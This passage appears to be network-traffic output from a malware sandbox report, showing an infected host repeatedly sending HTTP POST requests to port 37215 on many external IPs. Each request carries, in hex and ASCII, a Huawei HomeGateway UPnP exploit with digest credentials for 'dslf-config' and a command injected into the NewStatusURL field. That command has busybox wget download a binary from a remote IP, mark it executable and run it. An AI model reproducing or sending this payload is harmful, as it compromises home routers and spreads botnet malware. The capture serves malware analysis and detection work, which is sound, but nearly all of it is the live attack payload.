2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:42.376631021 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:17.191344023 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      112192.168.2.1450358156.110.241.20737215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.730418921 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.658061981 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.746073961 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.889940977 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:15.241705894 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:23.945389032 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:42.376631021 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:17.191344023 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      113192.168.2.1447950197.9.231.1337215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.731796026 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
